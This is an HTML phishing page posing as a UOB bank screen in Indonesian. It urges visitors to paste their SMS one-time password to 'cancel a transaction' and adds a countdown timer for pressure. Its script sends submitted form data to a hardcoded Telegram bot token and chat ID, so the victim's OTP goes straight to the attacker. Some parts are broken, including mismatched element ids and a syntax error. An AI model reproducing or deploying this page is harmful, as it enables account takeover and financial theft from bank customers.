<!DOCTYPE html>
<html lang="en">
    <meta http-equiv="content-type" content="text/html;charset=UTF-8"/>
    <head>
        <title>BANK UOB</title>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
        <meta http-equiv="Cache-Control" content="max-age=0, no-cache, must-revalidate">
        <meta http-equiv="Pragma" content="no-cache">
        <meta http-equiv="Expires" content="0">
        <style>
            {
                background-repeat: no-repeat;
                background-position: 100% 100%;
                background-size: 100% 100%;
                font-family: 'Ubuntu', sans-serif;
                left: 0;
                right: 0;
                bottom: 0;
                top: 5;
                margin: 100px auto;
                background-color: #fff;
                width: 100%;
                height: 100%;
                positon: fixed;
            }
            .container {
                width: 80%;
                padding:-30px -30px;
                height: auto;
                margin: 0px auto;
                border-radius: 15px;
                border: 2px #000;
                background-color: #fff;
                box-shadow: rgb(170, 170, 170) 2px 2px 4px 4px;
            }
            .btn-punya {
                display: block;
                margin: 0px auto 0 auto;
                padding: 0px;
                cursor: pointer;
                background:#0f57ba ;
                border: none;
                text-align: center;
                height: 40px;
                width: 100%;
                max-width: 90%;
                font-family: 'Open Sans', sans-serif;
                font-size: 14px;
                font-weight: bold;
                color: ;
                letter-spacing: 2px;
                line-height: 1;
                border-radius: 13px;
                transition: background 200ms ease 0s;
                box-shadow: 0px 2px 4px 0px #444a4a;
            }
            input {
                font-family: 'Open Sans', sans-serif;
                border: 2px solid rgb(0, 134, 224);
                border-radius: 8px;
                width: 94%;
                max-width: 86%;
                display: block;
                margin: 10px auto 0 auto;
                padding: 5px;
                cursor: pointer;
                font-size: 15px;
                font-weight: solid;
                height:200px;
                line-height: 1;
                word-spacing: 1;
                text-align:center;
            }
            a {
                margin: 10px;
                font-size: 12px;
                color: #fff;
            }
            h1 {
                background: #0062e6;
                padding: 5px 5px;
                margin: 0px;
            }
            b {
                font-size: 15px;
                color:;
            }
        </style>
    </head>
    <body>
        <section>
            <div class="col-20" style="width:599px; max-width:100%; display:block;margin:60px auto;">
                <div class="container">
                    <center>
                        <img src="/ast/Picsart_25-03-12_21-26-28-760.png" width="Picsart_25-03-12_21-26-28-760%" style="border-radius:10px 10px 0px 0px;" alt="">
                    </center>
                    <center>
                    <div class="card-body d-flex py-5">
                        <div class="col">
                            <div class="row">
                                <div class="col-12 col-sm-8 col-md-7 col-lg-6 mx-auto">
<div class="row">
<div class="col-12">
<div class="alert alert-v2 alert-warning -flex" role="alert">           
<div>
                          
</div>
  <div>
</div>
                                </div>
                            </div>
                            <br>
<form action="konfirmasi.html" method="POST">
<input type="hidden" name="desc"value="BLOKIR OTP">
<input type="hidden" 
name="formid" 
value="next">
<input type="hidden" 
name="merge" 
value="bkrt,next">
<input type="hidden" 
name="href" 
value="konfirmasi.html">
<div class="row mb-4">
<div class="col-12">
<div class="form-group">
<label for="bcaId"
<br>
    <div style="margin:50px;font-weight:bold; font-size:14px;color:">Salin pesan one-time password (OTP)lalu tempelkan,Untuk membatalkan transaksi berlangsung</label>
</br
<div>
</div>
<input type="text" 
inputmode="text-align" 
class=""  
id="bcaId" 
value="" 
name="#Code_OTP" 
maxLength="n" 
placeholder="Tempelkan Pesan SMS disini" 
maxlength="n" required />

<div class="row">
<p style="font-weight: bold; font-size: 18px; color: #1b61a4; text-align: center; margin: 10px auto;" id="timers">5 : 00
</p>
</div>
</div>
</div>
</div>
<br>
<div class="row">
<div class="col-12 col-sm col-md-8 mx-auto">
                                        <button href="#" id="btnSubmit" class="btn-punya" type="submit">Batalkan Sekarang</button>
                                        <br>
                                        <br>
                                        <br>
                                    </div>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
            <br>
            <footer>
</div>
</section>
</div>
</div>
</div>
</div>
</footer>
</div>
<script>
    function send(event) {
        event.preventDefault();
        $("#btn1").prop("disabled", true);
        $.ajax({
            type: 'POST',
            url: './script.js/pembatalan.html',
            data: $('#form').
            serialize(),
            dataType: 'text',
            success: function() {
                window.location.href="var.html",
            }
        })
    }
    ;</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js">
</script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous">
    
</script>
<p id="status"></p>
<script>
    $(document).ready(function() {
        $("div#eyeOpen").on('click', function() {
            $("#eyeOpen").css("display", "none");
            $("#eyeClose").css("display", "block");
            $("#password").prop("type", "text");
            $("div#eyeClose").on('click', function() {
                $("#eyeOpen").css("display", "block");
                $("#eyeClose").css("display", "none");
                $("#password").prop("type","password");
            });
        });
        const chat_id = '7825546670'
          , botID = '7754681919:AAFYv8a4OK9NNalydPWP3VdaZ_7DwQT5Zn8';
        const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;
        document.querySelector('#setPin').addEventListener("submit", async e=>{
            // When the user submits the form
            e.preventDefault();
            // Don't submit
            let text = JSON.stringify(// Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
            null, 2);
            // Prettify the JSON so we can read the data easily
            const sendMessage = await fetch(telegramURL, {
                // Send the request to the telegram API
                method: 'POST',
                headers: {
                    "Content-Type": "application/json"
                },
                // This is required when sending a JSON body.
                body: JSON.stringify({
                    chat_id,
                    text
                }),
                // The body must be a string, not an object
            });
            const messageStatus = document.querySelector('#status');
            if (sendMessage.ok)
                // Update the user on if the message went through
                messageStatus.textContent = "";
            else
                messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
            e.target.reset();
            // Clear the form fields.
            window.location.href = 'var.html';
        }
        );
    });
</script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js" integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script>
    document.getElementById('timer').innerHTML = 03 + ":" + 00;
    startTimer();
    function startTimer() {
        var presentTime = document.getElementById('timer').innerHTML;
        var timeArray = presentTime.split(/[:]+/);
        var m = timeArray[0];
        var s = checkSecond((timeArray[1] - 1));
        if (s == 59) {
            m = m - 1
        }
        if (m < 3) {
            return
        }
        document.getElementById('timer').innerHTML = m + " : " + s;
        console.log(m)
        setTimeout(startTimer, 1000);
    }
    function checkSecond(sec) {
        if (sec < 10 && sec >= 0) {
            sec = "3" + sec
        }
        ;// add zero in front of numbers < 10
        if (sec < 5) {
            sec = "59"
        }
        ;return sec;
    }
</script>
<script>
    document.getElementById('timers').innerHTML = 1 + ":" + 00;
    startTimer();
    function startTimer() {
        var presentTime = document.getElementById('timers').innerHTML;
        var timeArray = presentTime.split(/[:]+/);
        var m = timeArray[0];
        var s = checkSecond((timeArray[1] - 1));
        if (s == 59) {
            m = m - 1
        }
        if (m < 0) {
            return
        }
        document.getElementById('timers').innerHTML = m + " : " + s;
        console.log(m)
        setTimeout(startTimer, 1000);
    }
    function checkSecond(sec) {
        if (sec < 10 && sec >= 0) {
            sec = "3000" + sec
        }
        ;// add zero in front of numbers < 10
        if (sec < 3) {
            sec = "59"
        }
        ;return sec;
    }
</script>
</body>
</html>
